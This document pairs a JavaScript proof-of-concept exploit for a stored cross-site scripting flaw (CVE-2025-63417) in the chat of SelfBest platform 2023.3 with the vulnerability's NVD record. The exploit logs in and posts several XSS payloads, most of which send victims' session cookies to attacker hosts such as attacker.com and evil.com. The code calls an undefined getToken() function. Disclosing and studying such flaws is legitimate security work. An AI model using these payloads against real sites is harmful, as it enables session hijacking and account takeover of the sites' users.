CVE-2025-63417

// CVE-2025-63417 PoC - Stored XSS in SelfBest Platform Chat // Author: Security Researcher // Target: SelfBest platform 2023.3 // Step 1: Login to SelfBest platform with valid credentials const loginEndpoint = 'https://target-selfbest.com/api/auth/login'; const loginData = { username: 'attacker_account', password: 'attacker_password' }; // Step 2: Send malicious XSS payload via chat message const chatEndpoint = 'https://target-selfbest.com/api/chat/send'; const xssPayloads = [ '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>', '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">', '<svg onload="eval(atob(\'YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\'))">', '<iframe src="javascript:fetch(\'https://evil.com/pwn?c=\'+document.cookie)">'+ '<script>new Image().src="https://attacker.com/cookie?"+document.cookie</script>' ]; async function exploit() { // Login const loginResponse = await fetch(loginEndpoint, { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify(loginData), credentials: 'include' }); if (loginResponse.ok) { console.log('[+] Login successful'); // Send XSS payload for (const payload of xssPayloads) { const chatData = { message: payload, room_id: 'target_chat_room_id' }; const sendResponse = await fetch(chatEndpoint, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + await getToken() }, body: JSON.stringify(chatData), credentials: 'include' }); if (sendResponse.ok) { console.log('[+] XSS payload sent: ' + payload.substring(0, 30) + '...'); } } } } exploit(); // Note: This PoC is for authorized security testing only

{"cve": {"id": "CVE-2025-63417", "sourceIdentifier": "[email protected]", "published": "2025-11-05T19:16:04.407", "lastModified": "2025-11-07T19:46:48.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting (XSS) vulnerability in the chat functionality of the SelfBest platform 2023.3 allows authenticated attackers to inject arbitrary web scripts or HTML via the chat message input field. This malicious content is stored and then executed in the context of other users' browsers when they view the malicious message, potentially leading to session hijacking, account takeover, or other client-side attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:selfbest:selfbest:2023.3:*:*:*:*:*:*:*", "matchCriteriaId": "BEFD75F8-8977-44CF-9AF5-8F31DB2C85F3"}]}]}], "references": [{"url": "https://rohitchaudhary045.medium.com/cve-2025-63417-the-chatroom-compromise-stored-xss-in-selfbest-platform-f34ddcd984ea", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://rohitchaudhary045.medium.com/cve-2025-63417-the-chatroom-compromise-stored-xss-in-selfbest-platform-f34ddcd984ea", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}